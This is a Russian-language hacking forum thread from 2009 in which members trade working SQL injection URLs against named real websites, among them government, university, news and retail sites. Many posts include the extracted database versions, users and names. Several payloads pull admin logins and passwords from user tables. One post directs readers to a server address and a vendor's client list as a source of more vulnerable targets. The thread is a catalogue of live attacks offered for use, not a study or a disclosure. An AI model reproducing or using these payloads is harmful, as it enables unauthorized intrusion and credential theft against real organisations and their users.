SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. toross

    toross Banned

    Joined:
    11 Dec 2008
    Messages:
    28
    Likes Received:
    18
    Reputations:
    1
    4.1.22
     
  2. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,505
    Likes Received:
    398
    Reputations:
    228
    pr5
    http://www.cc-bassin-annonay.fr/communes/clubasso/consulterclubasso.php3?num=-18+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+users+/*+&css=2

    pr5
    http://www.latina.fr/index.php?id=3&art=-345+union+select+1,2,concat_ws(0x3a3a,pseudo,mdp,admin),4,5,6+from+users+--+

    http://www.adofm.fr/index.php?id=65&art=943&idcat=-16+union+select+1,2,unhex(hex(concat_ws(0x3a3a,pseudo,mdp,admin))),4,5,6,7+from+users+--+&idvid=168

    http://endirect.univ-fcomte.fr/index.php?id=numero_98_13_1&art=-1079'+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+/*+

    http://www.technique-voile.com/actualites_voile/index.php?ID=-233'+UniOn+sElEct+1,2,3,4,5,6,7,8,9,10,11+from+admin+--+
     
    3 people like this.
  3. hackmon

    hackmon Member

    Joined:
    16 Sep 2009
    Messages:
    61
    Likes Received:
    40
    Reputations:
    2
    http://www.xatrik.ru/katalog/
    Code:
    catalog.php?id=-1+union+select+1,user%28%29,3,4,5,6,7--
    xatrikr0_t@localhost
    4.1.25
     
  4. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    382
    Likes Received:
    69
    Reputations:
    20
    http://www.international-alert.org/press/archive.php?id=-243+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

    5.0.27:internationorg_all:cmr@localhost

    -------
    Tables

    http://www.international-alert.org/press/archive.php?id=-243+union+select+1,2,3,4,5,6,TABLE_NAME,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+INFORMATION_SCHEMA.TABLES--

    -------------------------
    http://www.webc-budapest.com/content/news_id.php?lang=en&id=-92+union+select+1,2,3,version(),5--

    user() - lh288200@localhost
    version() - 4.0.27
    database() - lh288200db
     
    #10804 SeNaP, 8 Oct 2009
    Last edited: 8 Oct 2009
    4 people like this.
  5. hackmon

    hackmon Member

    Joined:
    16 Sep 2009
    Messages:
    61
    Likes Received:
    40
    Reputations:
    2
    Code:
    http://eupodo.de/category.php?IndustryID=169+union+select+1,2,concat_ws(0x3a,loginid,password)+from+admin--
    
    5.0.32-Debian_7etch8-log
    eupodosql
    eupodosql1@localhost
    http://eupodo.de/category.php?IndustryID=169+union+select+1,2,user%28%29+from+admin--
     
    1 person likes this.
  6. InDuStRieS

    InDuStRieS Banned

    Joined:
    15 Mar 2009
    Messages:
    580
    Likes Received:
    254
    Reputations:
    32
    Code:
    http://www.ccrl.ca/print.php?id=-5061+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
     
  7. toross

    toross Banned

    Joined:
    11 Dec 2008
    Messages:
    28
    Likes Received:
    18
    Reputations:
    1
    Найден уязвимый движок сайт (CMS)

    Находиться по запросу в гугле:
    Найденный мною сайт:

     
    #10807 toross, 8 Oct 2009
    Last edited by a moderator: 8 Oct 2009
    1 person likes this.
  8. toross

    toross Banned

    Joined:
    11 Dec 2008
    Messages:
    28
    Likes Received:
    18
    Reputations:
    1
    Дальше разберетесь думаю
     
    1 person likes this.
  9. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    382
    Likes Received:
    69
    Reputations:
    20
    -------------------
    Code:
    http://www.fashionsnightout.com/storelisting.php?id=-707+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
    --
    version() - 5.0.51A
    user() - VOGUE_FASHION@LOCALHOST
    database() - VOGUE_FASHION
    --
    Таблицы

    Code:
    http://www.fashionsnightout.com/storelisting.php?id=-707+union+select+1,2,3,4,5,6,7,8,9,10,11,TABLE_NAME,13,14,15,16,17,18+from+INFORMATION_SCHEMA.TABLES--
    -------------------
    Code:
    http://vesti.az/category.php?id=-12+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13--
    --
    version() - 5.0.81-community
    user() - vestiaz@localhost
    database() - vestiaz_novost
    --
     
    2 people like this.
  10. hackmon

    hackmon Member

    Joined:
    16 Sep 2009
    Messages:
    61
    Likes Received:
    40
    Reputations:
    2
    5.0.32-Debian_7etch3~bpo31+1-log
    http://www.taiwanb2b.com/category.php?IndustryID=34+union+select+1,2,concat_ws%280x3a,loginid,password%29+from+admin--
     
    1 person likes this.
  11. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    754
    Likes Received:
    649
    Reputations:
    251
    User: root@www.steinbeis-europa.de
    Version: 5.0.32-Debian_7etch8-log
    Database: sez
     
    1 person likes this.
  12. toross

    toross Banned

    Joined:
    11 Dec 2008
    Messages:
    28
    Likes Received:
    18
    Reputations:
    1
    4.1.22 log
     
  13. Dyxxx

    Dyxxx Elder - Старейшина

    Joined:
    16 Feb 2009
    Messages:
    106
    Likes Received:
    153
    Reputations:
    24
    Pavlodar.gov.kz pr4 тИЦ=200
    Аппарат акима Павлодарской области
    Code:
    [COLOR=SlateGray]http://www.pavlodar.gov.kz/page.php?page_id=1000+and+substring(version(),1,1)=5[/COLOR]
    version: 5.1.22-rc-log
    user: db_pavlo@localhost


    ps/ родной город великого webkill'a?)
     
    #10813 Dyxxx, 9 Oct 2009
    Last edited: 9 Oct 2009
    4 people like this.
  14. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    99
    Likes Received:
    44
    Reputations:
    6
    Парашютисты
    HTML:
    http://www.skydiver.com.ua/publication/index.php?cat_id=-3%20union%20select%201,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,%2030%20--
    skydiver@localhost: skydiver: 4.0.27-log
     
  15. Zombi ****

    Zombi **** Elder - Старейшина

    Joined:
    4 Apr 2009
    Messages:
    457
    Likes Received:
    181
    Reputations:
    17
    http://www.ksk1.com.ua/news.php?id=-1+union+select+1,2,3,4--

    Database Version: 4.1.22-standard-log
    Database name: ksk1com_db
    User name: ksk1com_db@localhost
     
    8 people like this.
  16. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    PostgreSQL 8.1.5 on i386-pc-solaris2.10, compiled by GCC gcc (GCC) 3.4.6:sgg
     
    3 people like this.
  17. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    99
    Likes Received:
    44
    Reputations:
    6
    Магазин одежды 5-я ветка

    HTML:
    http://www.svitstyle.com.ua/index.php?page=-14%20union%20select%201,2,3,concat_ws%28char%2858%29,login,psw%29,5,6%20FROM%20guest%20limit%201,1
    HTML:
    http://www.svitstyle.com.ua/index.php?page=-14%20union%20select%201,2,3,concat_ws%28char%2858%29,uname,upass%29,5,6%20FROM%20users%20limit%201,1
    Разные таблы.

    Новости Днепропетровска и Украины 5-я ветка
    HTML:
    http://www.prodnepr.dp.ua/news.php3?action=details&news_id=-1335%20union%20select%201,2,login,4,passw+FROM%20job_catvip
     
    2 people like this.
  18. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    141
    Likes Received:
    216
    Reputations:
    17
    http://www.swftools.com/
    Code:
    http://www.swftools.com/tools-category.php?cat=-289'+union+select+1,group_concat(table_name,0x3a,table_schema),3,4,5,6,7,8+from+information_schema.columns+where+column_name+like+'%pas%'--+
    
    http://www.naturistproperty.com/
    Code:
    http://www.naturistproperty.com/index.php?ac=details&id=86+union+select+1,2,3,4,5,6,concat_ws(0x3a,admin_id,first_name,last_name,email,password),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+admin--+
    
    http://www.naturistproperty.com/admin
     
    3 people like this.
  19. xa-xa89

    xa-xa89 Elder - Старейшина

    Joined:
    17 May 2008
    Messages:
    109
    Likes Received:
    27
    Reputations:
    2
    EDU
    PR7
    Code:
    http://www.cogsci.ucsd.edu/cmp-general-data-display.php?display=true&what=perspective&id=119+and+1=0+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),6,7,8,9,10+--+-
    Database version:5.0.77
    Database user: admin@localhost
    Database name: cogsci
    OS version:redhat-linux-gnu
     
    3 people like this.
  20. toross

    toross Banned

    Joined:
    11 Dec 2008
    Messages:
    28
    Likes Received:
    18
    Reputations:
    1
    Уязвимые скрипты сайтов и сервер!!!

    Вот ОПЯТЬ нашел уязвимый скрипт CMS сайта или галерея картинок что то типо того.

    Название CMS: All text and images © copyright Delta Patchwork LLC или что то типо того

    Расположение сайтов: https://208.186.168.218:19638/siteadmin/?ocw_login_domain=
    все эти уязвимые двиги расположенны на этом серевер!

    Находить их можно по запросу в гугле:

    или


    Если Вы хотите похекать все сайты без проблем (тоесть поиска)

    Прошу посетить сайт дизайнеров этой кмс, там они выложили всех своих клиентов!

    Сайты америки:
    http://www.gloderworks.com/USA-portfolio.php

    Сайты королевства:
    http://www.gloderworks.com/UK-portfolio.php

    А да и еще сам сайт дизайнеров тоже уязвим...

    ОТ плюсегов неоткажусь
     
    #10820 toross, 10 Oct 2009
    Last edited: 10 Oct 2009
    5 people like this.
Loading...
Thread Status:
Not open for further replies.